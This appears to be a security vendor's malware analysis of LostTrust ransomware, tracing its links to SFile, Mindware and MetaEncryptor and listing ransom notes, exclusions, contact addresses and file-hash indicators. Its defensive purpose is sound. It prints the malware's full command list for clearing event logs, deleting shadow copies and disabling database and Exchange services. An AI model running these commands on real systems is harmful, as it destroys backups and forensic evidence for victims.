LostTrust Ransomware | Latest Multi-Extortion Threat Shares Traits with SFile and Mindware

The LostTrust ransomware operation is a new multi-extortion threat that emerged in September 2023. Our analysis of LostTrust malware payloads indicates that the family is an evolution of SFile and Mindware, and that all three follow similar operations and tradecraft to MetaEncryptor. Similarities between the LostTrust leaks sites and the earlier MetaEncryptor leaks sites are also apparent, while aspects of SFile encryptor previously observed with MetaEncryptor campaigns are still in use with the LostTrust payloads we analyzed.

In this analysis, we provide a high-level technical outline of where these ransomware families and their operations overlap. We will examine LostTrust payload behavior as well as compare artifacts to the SFile and Mindware families.

LostTrust Ransom Demands

LostTrust victims are presented with a ransom note that attempts to portray the gang as providing a service, a fake veneer that is commonly adopted by cybercriminals perpetrating intrusions. An excerpt from a LostTrust ransom note illustrates this approach:

Our team has an extensive background in legal and so called white hat hacking.
However, clients usually considered the found vulnerabilities to be minor and poorly
paid for our services.
So we decided to change our business model. Now you understand how important it is
to allocate a good budget for IT security.
This is serious business for us and we really don’t want to ruin your privacy,
reputation and a company.
We just want to get paid for our work whist finding vulnerabilities in various networks.

LostTrust ransom note

The LostTrust leaks site contains information claiming that the gang are “young people who identify themselves as specialists in the field of network security”. Thinly-veiled threats that stolen data will be made available to interested parties if the gang do not receive payment are followed by a warning that notification of the victim’s breach will be widely publicized.

LostTrust Execution Details

In order to prevent existing processes on the victim device inhibiting encryption or data exfiltration, LostTrust ransomware payloads attempt to discover and terminate a plethora of services and processes. Critical services associated with the processes belonging to Microsoft Exchange, MSSQL, SharePoint, Tomcat, postgresql and others are terminated if identified.

The ransomware initiates numerous, hidden CMD.EXE sessions in order to carry out these tasks. The hidden CMD.EXE windows subsequently host the observed WMIC, NET, SC, taskkill, VSSADMIN and wevtutil commands.

In addition to process discovery and termination, the ransomware attempts to remove VSS (Volume Shadow Copies) via VSSADMIN, as well as clearing out all Windows Event Logs via wevtutil.exe.

LostTrust payload execution output is streamed to a visible command window, allowing for clear observation of the various encryption stages.

LostTrust output

The full list of observed commands is as follows:

“C:WindowsSystem32cmd.exe” /c wevtutil cl Application
“C:WindowsSystem32cmd.exe” /c wevtutil cl security
“C:WindowsSystem32cmd.exe” /c wevtutil cl setup
“C:WindowsSystem32cmd.exe” /c wevtutil cl system
“C:WindowsSystem32cmd.exe” /c vssadmin.exe delete shadows /all /quiet
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%Firebird%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%MSSQL%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%SQL%'” CALL STOPSERVIC
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%Exchange%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%wsbex%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%postgresql%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%BACKP%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%tomcat%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%SharePoint%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%SBS%'” CALL STOPSERVICE
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%Firebird%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%MSSQL%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%SQL%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%Exchange%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%wsbex%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%postgresql%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%BACKP%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%tomcat%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%SharePoint%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c WMIC SERVICE WHERE “caption LIKE ‘%SBS%'” CALL ChangeStartMode ‘Disabled’
“C:WindowsSystem32cmd.exe” /c sc config FirebirdServerDefaultInstance start= disabled
“C:WindowsSystem32cmd.exe” /c taskkill /IM fb_inet_server.exe /F
“C:WindowsSystem32cmd.exe” /c net stop FirebirdServerDefaultInstance
“C:WindowsSystem32cmd.exe” /c C:Windowssystem32net1 stop FirebirdServerDefaultInstance
“C:WindowsSystem32cmd.exe” /c taskkill /IM sqlservr.exe /F
“C:WindowsSystem32cmd.exe” /c sc config MSSQLSERVER start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSSQL$SQLEXPRESS start= disabled
“C:WindowsSystem32cmd.exe” /c net stop MSSQLSERVER
“C:WindowsSystem32cmd.exe” /c C:Windowssystem32net1 stop MSSQLSERVER
“C:WindowsSystem32cmd.exe” /c net stop MSSQL$SQLEXPRESS
“C:WindowsSystem32cmd.exe” /c C:Windowssystem32net1 stop MSSQL$SQLEXPRESS
“C:WindowsSystem32cmd.exe” /c taskkill /IM pg_ctl.exe /F
“C:WindowsSystem32cmd.exe” /c sc config postgresql-9.0 start= disabled
“C:WindowsSystem32cmd.exe” /c net stop postgresql-9.0
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeAB start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeAntispamUpdate start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeEdgeSync start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeFDS start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeFBA start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeImap4 start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeIS start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeMailSubmission start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeMailboxAssistants start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeMailboxReplication start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeMonitoring start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangePop3 start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeProtectedServiceHost start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeRPC start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeSearch start= disable
“C:WindowsSystem32cmd.exe” /c sc config wsbexchange start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeSA start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeThrottling start= disabled
“C:WindowsSystem32cmd.exe” /c sc config MSExchangeTransportLogSearch start= disabled
“C:WindowsSystem32cmd.exe” /c net stop MSExchangeAB
“C:WindowsSystem32cmd.exe” /c net stop MSExchangeAntispamUpdate
“C:WindowsSystem32cmd.exe” /c net stop MSExchangeEdgeSync
“C:WindowsSystem32cmd.exe” /c net stop MSExchangeImap4
“C:WindowsSystem32cmd.exe” /c net stop MSExchangeMailboxReplication
“C:WindowsSystem32cmd.exe” /c net stop MSExchangeProtectedServiceHost

Supported Command-line Arguments

LostTrust payloads support the following command-line arguments:

–enable-shares
enable discovery and encryption of accessible network volumes

–onlypath
Only encrypt files in the specified path.

Supported command-line arguments in LostTrust

The –enable-shares option has been seen in previous Sfile/Mindware samples. Notably, however, LostTrust does not include  previously seen SFile or Mindware parameters such as –killsusp.

Encrypted files are modified with the “.losttrustencoded” file extension, and a LostTrust ransom note is written to each folder containing encrypted items as !!LostTrustEncoded.txt.

Files encrypted by LostTrust

Similarities to Mindware and SFile

We previously reported on the connection between Mindware and SFile, and LostTrust bears indications that it is an extension of this lineage.  LostTrust payloads, like those deployed by MetaEncryptor before, are based on the SFile encryptor. As such, the payloads for LostTrust and MetaEncryptor behave in a similar fashion, and produce similar artifacts. This includes overlap of the extensions to include in the encryption process, as well as what to exclude.

LostTrust handles exclusions via pattern/string (like the predecessors).  The full list of excluded patterns in observed LostTrust samples is:

$RECYCLE.BIN
all usersmicrosoft
All UsersMicrosoft

Application DataMicrosoft
boot
cache

cache2
Common Files
CommonMicrosoft

DefaultExtensions
drivers
far manager

google
ida 6.8
ida 7.0

inetpublogs
intel
Local SettingsMicrosoft

LocalMicrosoft
LocalLowMicrosoft
mozilla

msocache
perflogs
Program FilesInternet Explorer

Program FilesMicrosoft Games
ProgramDataMicrosoft
RoamingMicrosoft

Systemmsadc
Temp
Temporary Internet Files

tor browser
windows.old
windowssystem

windowssystem32
windowssyswow64
windowswinsxs

WindowsPowerShell
wsus
%windir%

$windows.~bt
$windows.~ws
autorun.inf

boot.ini
bootfont.bin
bootmgr

bootsect.bak
desktop.ini
iconcache.db

ntldr
ntuser.dat
ntuser.dat.log

ntuser.ini
thumbs.db

:system volume information
! cynet ransom protection(don’t delete)
!losttrustencoded.txt

Mindware encryption exclusions
Mindware encryption exclusions

Encryption inclusion/exclusion in LostTrust looks similar to its Mindware and SFile predecessors.

Victim Blog Site

The TOR-based blog site for LostTrust appears to be a direct facsimile of the MetaEncryptor blog. Formatting and contact information (TOX) all match up. While there are no direct victim overlaps between the LostTrust and MetaEncryptor sites, some victims listed on LostTrust have been previously listed on leaks sites such as Royal, LockBit 3, and Medusa.

MetaEncryptor and LostTrust blogs existing in parallel

At the time of writing, 53 victims are listed on the LostTrust blog and 13 on the MetaEncryptor blog. Both blog sites remain active, while the MetaEncryptor blog has also been updated recently.

Comparison of LostTrust, Mindware and SFile Ransom Notes

LostTrust vs SFile ransom notes (head)
LostTrust vs. SFile ransom notes (tail):  Contact Instructions

Ransom note construction is also similar across relevant Mindware and LostTrust malware samples.

Ransom note construction in Mindware
Ransom note construction in LostTrust

MetaEncryptor Strings and Artifacts

LostTrust, like SFile and Mindware, contains known references and functions around encryption staging.

MetaEncryptor references upon launch of LostTrust
MetaEncryptor references in SFile

The cross-references to MetaEncryptor encryption stage can be viewed within the LostTrust payload binaries as well.

Internal references to MetaEncryptor (LostTrust)

Debug Paths & String Artifacts

Throughout the timeline of SFile to LostTrust, we see some commonalities with regards to the included debug paths and string artifacts.

SFile
Mindware
LostTrust

C:fake_exe.pdb
D:fake.pdb
C:fake_exe.pdb

D:fake.pdb
C:fake_exe.pdb

D:coderansomware_winbindecoder.pdb

There is some variance among the email addresses provided in the ransom notes across these families as well. For example:

SFile

clark.rotband[@]mailfence[.]com
finbdodscokpd[@]privatemail[.]com

gnidhyg[@]protonmail[.]com
greemsy.jj[@]protonmail[.]ch

jj.greemsy[@]mailfence[.]com
johny1cashusa[@]protonmail[.]ch

johny2[@]mailfence[.]com
johny2recoveryusa[@]protonmail[.]com

johny3[@]mailfence[.]com
jorge.smith[@]mailfence[.]com

mally[@]mailfence[.]com
mallyrecovery[@]protonmail[.]ch

mandysales[@]mailfence[.]com
primethetime[@]protonmail[.]com

recoverfiles[@]ctemplar[.]com
recoverfilesquickly[@]ctemplar[.]com

salesmandy[@]protonmail[.]com

Mindware

cacaoocacaooohusl[@]onionmail[.]org
corpovigiligiurati[@]onionmail[.]org

corpovigiligiuratiii[@]mailfence[.]com
lifespire[@]mailfence[.]com

lifespire[@]onionmail[.]org
niss.brandon[@]mailfence[.]com

niss.brook[@]onionmail[.]org
pationatiforsa[@]mailfence[.]com

MetaEncryptor

hamfrelors[@]proton[.]me
hermond.glass[@]mailfence[.]com

SentinelOne Detects and Protects Against LostTrust Ransomware

SentinelOne Singularity detects and prevents malicious behaviors and artifacts associated with LostTrust ransomware.

Conclusion

In this analysis we have provided a technical outline of where these ransomware families and operations overlap. When LostTrust’s blog emerged in September 2023, many eyebrows were raised given the immediate similarities noticed between the LostTrust and MetaEncryptor sites. Our current observations and analysis indicate that “LostTrust” is an evolution of SFile and Mindware.

Organizations without SentinelOne are recommended to review the indicators provided below and throughout this post.

Indicators of Compromise

SFile
0f20e5ccdbbed4cc3668577286ca66039c410f95
14e4557ea8d69d289c2432066d860b60a6698548
28f73b38ace67b48e525d165e7a16f3b51cec0c0
5ffac9dff916d69cd66e91ec6228d8d92c5e6b37
665572b84702c4c77f59868c5fe4d0b621f2e62a
6960beedbf4c927b75747ba08fe4e2fa418d4d9b
8c507d26c2fec90707320ffb721ae626139bbf11
a67686b5ce1d970a7920b47097d20dee927f0a4d
bdb0c0282b303843e971fbcd6d2888d834da204c

Mindware
46ca0c5ad4911d125a245adb059dc0103f93019d
9bc1972a75bb88501d92901efc9970824e6ee3f5
ae974e5c37936ac8f25cfea0225850be61666874
e9b52a4934b4a7194bcbbe27ddc5b723113f11fe
f91d3c1c2b85727bd4d1b249cd93a30897c44caa

MetaEncryptor
e04760f670fab000c5ff01da39d4f4994011e581

LostTrust
09170b8fd03258b0deaa7b881c46180818b88381

Leave a Comment

Your email address will not be published. Required fields are marked *